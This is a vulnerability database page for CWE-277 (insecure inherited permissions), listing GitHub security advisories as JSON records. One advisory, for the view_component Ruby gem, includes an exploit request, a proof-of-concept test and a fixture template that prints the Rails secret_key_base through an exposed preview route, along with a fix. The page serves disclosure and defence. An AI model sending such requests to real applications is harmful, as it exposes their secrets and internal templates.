CWE-277
AllowedInsecure Inherited Permissions
Abstraction: Variant · Status: Draft
A product defines a set of insecure permissions that are inherited by objects that are created by the program.
116 vulnerabilities reference this CWE, most recent first.
GHSA-4RXW-R623-VP2W
Vulnerability from github – Published: 2023-11-14 21:31 – Updated: 2023-11-14 21:31Insecure inherited permissions in some Intel Rapid Storage Technology software before version 16.8.5.1014.9 may allow an authenticated user to potentially enable escalation of privilege via local access.
{
"affected": [],
"aliases": [
"CVE-2023-39230"
],
"database_specific": {
"cwe_ids": [
"CWE-277",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T19:15:29Z",
"severity": "MODERATE"
},
"details": "Insecure inherited permissions in some Intel Rapid Storage Technology software before version 16.8.5.1014.9 may allow an authenticated user to potentially enable escalation of privilege via local access.",
"id": "GHSA-4rxw-r623-vp2w",
"modified": "2023-11-14T21:31:02Z",
"published": "2023-11-14T21:31:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39230"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00961.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-52MX-4F7F-JVVM
Vulnerability from github – Published: 2024-05-14 15:32 – Updated: 2026-04-02 21:31This issue was addressed with improved checks This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An app may be able to bypass Privacy preferences.
{
"affected": [],
"aliases": [
"CVE-2024-27847"
],
"database_specific": {
"cwe_ids": [
"CWE-277"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T15:13:08Z",
"severity": "HIGH"
},
"details": "This issue was addressed with improved checks This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An app may be able to bypass Privacy preferences.",
"id": "GHSA-52mx-4f7f-jvvm",
"modified": "2026-04-02T21:31:42Z",
"published": "2024-05-14T15:32:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27847"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120898"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120899"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120900"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120903"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120905"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214101"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214106"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214100"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214101"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214105"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214106"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214107"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/May/10"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/May/12"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-556F-J5X6-83X8
Vulnerability from github – Published: 2026-02-10 18:30 – Updated: 2026-02-10 18:30Insecure inherited permissions for some Intel(R) Graphics Software before version 25.30.1702.0 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.
{
"affected": [],
"aliases": [
"CVE-2025-32092"
],
"database_specific": {
"cwe_ids": [
"CWE-277"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-10T17:16:16Z",
"severity": "MODERATE"
},
"details": "Insecure inherited permissions for some Intel(R) Graphics Software before version 25.30.1702.0 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.",
"id": "GHSA-556f-j5x6-83x8",
"modified": "2026-02-10T18:30:40Z",
"published": "2026-02-10T18:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32092"
},
{
"type": "WEB",
"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01385.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-59X7-FJC6-6PRX
Vulnerability from github – Published: 2023-11-14 21:31 – Updated: 2023-11-14 21:31Insecure inherited permissions in some Intel(R) NUC Watchdog Timer installation software before version 2.0.21.0 may allow an authenticated user to potentially enable escalation of privilege via local access.
{
"affected": [],
"aliases": [
"CVE-2022-33898"
],
"database_specific": {
"cwe_ids": [
"CWE-277",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T19:15:11Z",
"severity": "MODERATE"
},
"details": "Insecure inherited permissions in some Intel(R) NUC Watchdog Timer installation software before version 2.0.21.0 may allow an authenticated user to potentially enable escalation of privilege via local access.",
"id": "GHSA-59x7-fjc6-6prx",
"modified": "2023-11-14T21:31:00Z",
"published": "2023-11-14T21:31:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33898"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00908.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-62JJ-2MW3-WFP2
Vulnerability from github – Published: 2026-04-20 18:31 – Updated: 2026-04-20 18:31Insecure Permissions vulnerability in DeepCool DeepCreative v.1.2.7 and before allows a local attacker to execute arbitrary code via a crafted file
{
"affected": [],
"aliases": [
"CVE-2026-30266"
],
"database_specific": {
"cwe_ids": [
"CWE-277"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-20T17:16:33Z",
"severity": "HIGH"
},
"details": "Insecure Permissions vulnerability in DeepCool DeepCreative v.1.2.7 and before allows a local attacker to execute arbitrary code via a crafted file",
"id": "GHSA-62jj-2mw3-wfp2",
"modified": "2026-04-20T18:31:49Z",
"published": "2026-04-20T18:31:49Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30266"
},
{
"type": "WEB",
"url": "https://github.com/uncle-hash/vulnerability-research/tree/main/CVE-2026-30266"
},
{
"type": "WEB",
"url": "http://deepcool.com"
},
{
"type": "WEB",
"url": "http://deepcreative.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-68J3-86CC-WP27
Vulnerability from github – Published: 2024-06-12 15:31 – Updated: 2024-08-21 18:31Insecure permissions in the AdminController.AjaxSave() method of PPGo_Jobs v2.8.0 allows authenticated attackers to arbitrarily modify users' account information.
{
"affected": [],
"aliases": [
"CVE-2024-36691"
],
"database_specific": {
"cwe_ids": [
"CWE-277"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-12T15:15:52Z",
"severity": "MODERATE"
},
"details": "Insecure permissions in the AdminController.AjaxSave() method of PPGo_Jobs v2.8.0 allows authenticated attackers to arbitrarily modify users\u0027 account information.",
"id": "GHSA-68j3-86cc-wp27",
"modified": "2024-08-21T18:31:26Z",
"published": "2024-06-12T15:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36691"
},
{
"type": "WEB",
"url": "https://www.yuque.com/beimi-tb0gl/yrgtbp/wi8bg26o3wlfqdaf?singleDoc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-6PXP-6H5G-5389
Vulnerability from github – Published: 2025-01-18 15:31 – Updated: 2025-01-18 15:31IBM Robotic Process Automation 21.0.0 through 21.0.7.17 and 23.0.0 through 23.0.18 could allow a local user to escalate their privileges. All files in the install inherit the file permissions of the parent directory and therefore a non-privileged user can substitute any executable for the nssm.exe service. A subsequent service or server restart will then run that binary with administrator privilege.
{
"affected": [],
"aliases": [
"CVE-2024-51448"
],
"database_specific": {
"cwe_ids": [
"CWE-277",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-18T15:15:08Z",
"severity": "MODERATE"
},
"details": "IBM Robotic Process Automation 21.0.0 through 21.0.7.17 and 23.0.0 through 23.0.18 could allow a local user to escalate their privileges. All files in the install inherit the file permissions of the parent directory and therefore a non-privileged user can substitute any executable for the nssm.exe service. A subsequent service or server restart will then run that binary with administrator privilege.",
"id": "GHSA-6pxp-6h5g-5389",
"modified": "2025-01-18T15:31:30Z",
"published": "2025-01-18T15:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51448"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7177586"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6XHF-2FJJ-WQ6J
Vulnerability from github – Published: 2024-07-24 18:31 – Updated: 2024-08-01 15:32Insecure permissions in contour v1.28.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.
{
"affected": [],
"aliases": [
"CVE-2024-36539"
],
"database_specific": {
"cwe_ids": [
"CWE-277"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-24T17:15:10Z",
"severity": "CRITICAL"
},
"details": "Insecure permissions in contour v1.28.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account\u0027s token.",
"id": "GHSA-6xhf-2fjj-wq6j",
"modified": "2024-08-01T15:32:07Z",
"published": "2024-07-24T18:31:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36539"
},
{
"type": "WEB",
"url": "https://gist.github.com/HouqiyuA/c92f9ec979653dceeea947afd0b47a80"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-7F3R-GWC9-2995
Vulnerability from github – Published: 2026-05-08 23:33 – Updated: 2026-06-08 23:34Summary
The preview route derives an example name from the URL and calls it with public_send. The code does not verify that the requested method is one of the preview examples explicitly defined by the preview class.
As a result, inherited public methods on ViewComponent::Preview are route-reachable. The most important one is render_with_template, which accepts template: and locals:. Those values can come from request params and are later passed to Rails as render template:.
If previews are exposed, an attacker can render internal Rails templates that are not otherwise routable.
Severity: High if preview routes are externally reachable; Medium otherwise.
Affected files:
lib/view_component/preview.rbapp/controllers/concerns/view_component/preview_actions.rbapp/views/view_components/preview.html.erb
Relevant Code
app/controllers/concerns/view_component/preview_actions.rb:
@example_name = File.basename(params[:path])
@render_args = @preview.render_args(@example_name, params: params.permit!)
lib/view_component/preview.rb:
example_params_names = instance_method(example).parameters.map(&:last)
provided_params = params.slice(*example_params_names).to_h.symbolize_keys
result = provided_params.empty? ? new.public_send(example) : new.public_send(example, **provided_params)
app/views/view_components/preview.html.erb:
<%= render template: @render_args[:template], locals: @render_args[:locals] || {} %>
The UI only lists direct preview methods via:
public_instance_methods(false).map(&:to_s).sort
But render_args does not enforce that list before dispatching.
Exploit Flow
Example request:
GET /rails/view_components/my_component/render_with_template?template=internal/secret&locals[poc_local]=attacker-controlled-local&request_marker=attacker-controlled-request
Flow:
my_componentresolves to a valid preview.File.basename(params[:path])returnsrender_with_template.render_argscalls inheritedViewComponent::Preview#render_with_template.- Request params provide
template: "internal/secret"andlocals: {...}. - The preview view renders
internal/secretwith attacker-controlled locals.
Impact depends on what internal templates render. In the worst case this can expose secrets, config, debug data, admin-only partials, or request/session-derived values.
PoC Test
This checkout already contains a PoC at:
test/sandbox/test/security_preview_template_poc_test.rbtest/sandbox/app/views/internal/secret.html.erb
The test proves that /internal/secret is not directly routable, but can still be rendered through the preview endpoint by invoking inherited render_with_template.
If reproducing manually, run:
bundle exec ruby -Itest test/sandbox/test/security_preview_template_poc_test.rb
Equivalent standalone test:
# frozen_string_literal: true
require "test_helper"
class SecurityPreviewTemplatePocTest < ActionDispatch::IntegrationTest
def setup
ViewComponent::Preview.__vc_load_previews
end
def test_preview_route_can_invoke_inherited_render_with_template
refute_includes MyComponentPreview.examples, "render_with_template"
assert_raises(ActionController::RoutingError) do
Rails.application.routes.recognize_path("/internal/secret")
end
get(
"/rails/view_components/my_component/render_with_template",
params: {
template: "internal/secret",
locals: {poc_local: "attacker-controlled-local"},
request_marker: "attacker-controlled-request"
}
)
assert_response :success
assert_includes response.body, "VC_PREVIEW_POC_SECRET=foo"
assert_includes response.body, "VC_PREVIEW_POC_LOCAL=attacker-controlled-local"
assert_includes response.body, "VC_PREVIEW_POC_REQUEST=attacker-controlled-request"
end
end
Fixture template:
<div id="poc-secret">VC_PREVIEW_POC_SECRET=<%= Rails.application.secret_key_base %></div>
<div id="poc-local">VC_PREVIEW_POC_LOCAL=<%= local_assigns[:poc_local] || local_assigns["poc_local"] %></div>
<div id="poc-request">VC_PREVIEW_POC_REQUEST=<%= params[:request_marker] %></div>
Suggested Fix
Only dispatch explicitly declared preview examples:
def render_args(example, params: {})
example = example.to_s
raise AbstractController::ActionNotFound unless examples.include?(example)
example_params_names = instance_method(example).parameters.map(&:last)
provided_params = params.slice(*example_params_names).to_h.symbolize_keys
result = provided_params.empty? ? new.public_send(example) : new.public_send(example, **provided_params)
result ||= {}
result[:template] = preview_example_template_path(example) if result[:template].nil?
@layout = nil unless defined?(@layout)
result.merge(layout: @layout)
end
Add a regression test that /rails/view_components/my_component/render_with_template fails unless render_with_template is explicitly defined as a preview example on that class.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "view_component"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "4.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44836"
],
"database_specific": {
"cwe_ids": [
"CWE-277",
"CWE-749"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T23:33:14Z",
"nvd_published_at": "2026-05-26T21:16:38Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nThe preview route derives an example name from the URL and calls it with `public_send`. The code does not verify that the requested method is one of the preview examples explicitly defined by the preview class.\n\nAs a result, inherited public methods on `ViewComponent::Preview` are route-reachable. The most important one is `render_with_template`, which accepts `template:` and `locals:`. Those values can come from request params and are later passed to Rails as `render template:`.\n\nIf previews are exposed, an attacker can render internal Rails templates that are not otherwise routable.\n\nSeverity: High if preview routes are externally reachable; Medium otherwise.\n\nAffected files:\n\n- `lib/view_component/preview.rb`\n- `app/controllers/concerns/view_component/preview_actions.rb`\n- `app/views/view_components/preview.html.erb`\n\n\n### Relevant Code\n\n`app/controllers/concerns/view_component/preview_actions.rb`:\n\n```ruby\n@example_name = File.basename(params[:path])\n@render_args = @preview.render_args(@example_name, params: params.permit!)\n```\n\n`lib/view_component/preview.rb`:\n\n```ruby\nexample_params_names = instance_method(example).parameters.map(\u0026:last)\nprovided_params = params.slice(*example_params_names).to_h.symbolize_keys\nresult = provided_params.empty? ? new.public_send(example) : new.public_send(example, **provided_params)\n```\n\n`app/views/view_components/preview.html.erb`:\n\n```erb\n\u003c%= render template: @render_args[:template], locals: @render_args[:locals] || {} %\u003e\n```\n\nThe UI only lists direct preview methods via:\n\n```ruby\npublic_instance_methods(false).map(\u0026:to_s).sort\n```\n\nBut `render_args` does not enforce that list before dispatching.\n\n### Exploit Flow\n\nExample request:\n\n```text\nGET /rails/view_components/my_component/render_with_template?template=internal/secret\u0026locals[poc_local]=attacker-controlled-local\u0026request_marker=attacker-controlled-request\n```\n\nFlow:\n\n1. `my_component` resolves to a valid preview.\n2. `File.basename(params[:path])` returns `render_with_template`.\n3. `render_args` calls inherited `ViewComponent::Preview#render_with_template`.\n4. Request params provide `template: \"internal/secret\"` and `locals: {...}`.\n5. The preview view renders `internal/secret` with attacker-controlled locals.\n\nImpact depends on what internal templates render. In the worst case this can expose secrets, config, debug data, admin-only partials, or request/session-derived values.\n\n### PoC Test\n\nThis checkout already contains a PoC at:\n\n- `test/sandbox/test/security_preview_template_poc_test.rb`\n- `test/sandbox/app/views/internal/secret.html.erb`\n\nThe test proves that `/internal/secret` is not directly routable, but can still be rendered through the preview endpoint by invoking inherited `render_with_template`.\n\nIf reproducing manually, run:\n\n```bash\nbundle exec ruby -Itest test/sandbox/test/security_preview_template_poc_test.rb\n```\n\nEquivalent standalone test:\n\n```ruby\n# frozen_string_literal: true\n\nrequire \"test_helper\"\n\nclass SecurityPreviewTemplatePocTest \u003c ActionDispatch::IntegrationTest\n def setup\n ViewComponent::Preview.__vc_load_previews\n end\n\n def test_preview_route_can_invoke_inherited_render_with_template\n refute_includes MyComponentPreview.examples, \"render_with_template\"\n\n assert_raises(ActionController::RoutingError) do\n Rails.application.routes.recognize_path(\"/internal/secret\")\n end\n\n get(\n \"/rails/view_components/my_component/render_with_template\",\n params: {\n template: \"internal/secret\",\n locals: {poc_local: \"attacker-controlled-local\"},\n request_marker: \"attacker-controlled-request\"\n }\n )\n\n assert_response :success\n assert_includes response.body, \"VC_PREVIEW_POC_SECRET=foo\"\n assert_includes response.body, \"VC_PREVIEW_POC_LOCAL=attacker-controlled-local\"\n assert_includes response.body, \"VC_PREVIEW_POC_REQUEST=attacker-controlled-request\"\n end\nend\n```\n\nFixture template:\n\n```erb\n\u003cdiv id=\"poc-secret\"\u003eVC_PREVIEW_POC_SECRET=\u003c%= Rails.application.secret_key_base %\u003e\u003c/div\u003e\n\u003cdiv id=\"poc-local\"\u003eVC_PREVIEW_POC_LOCAL=\u003c%= local_assigns[:poc_local] || local_assigns[\"poc_local\"] %\u003e\u003c/div\u003e\n\u003cdiv id=\"poc-request\"\u003eVC_PREVIEW_POC_REQUEST=\u003c%= params[:request_marker] %\u003e\u003c/div\u003e\n```\n\n### Suggested Fix\n\nOnly dispatch explicitly declared preview examples:\n\n```ruby\ndef render_args(example, params: {})\n example = example.to_s\n raise AbstractController::ActionNotFound unless examples.include?(example)\n\n example_params_names = instance_method(example).parameters.map(\u0026:last)\n provided_params = params.slice(*example_params_names).to_h.symbolize_keys\n result = provided_params.empty? ? new.public_send(example) : new.public_send(example, **provided_params)\n result ||= {}\n result[:template] = preview_example_template_path(example) if result[:template].nil?\n @layout = nil unless defined?(@layout)\n result.merge(layout: @layout)\nend\n```\n\nAdd a regression test that `/rails/view_components/my_component/render_with_template` fails unless `render_with_template` is explicitly defined as a preview example on that class.",
"id": "GHSA-7f3r-gwc9-2995",
"modified": "2026-06-08T23:34:27Z",
"published": "2026-05-08T23:33:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ViewComponent/view_component/security/advisories/GHSA-7f3r-gwc9-2995"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44836"
},
{
"type": "PACKAGE",
"url": "https://github.com/ViewComponent/view_component"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/view_component/CVE-2026-44836.yml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "view_component: Preview Route Can Dispatch Inherited Helper Methods"
}
GHSA-7W35-8V2M-9GRG
Vulnerability from github – Published: 2024-08-14 15:31 – Updated: 2024-08-14 15:31Insecure inherited permissions in some Intel(R) HID Event Filter software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.
{
"affected": [],
"aliases": [
"CVE-2024-25561"
],
"database_specific": {
"cwe_ids": [
"CWE-277",
"CWE-732"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-14T14:15:22Z",
"severity": "MODERATE"
},
"details": "Insecure inherited permissions in some Intel(R) HID Event Filter software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.",
"id": "GHSA-7w35-8v2m-9grg",
"modified": "2024-08-14T15:31:15Z",
"published": "2024-08-14T15:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25561"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01089.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
No CAPEC attack patterns related to this CWE.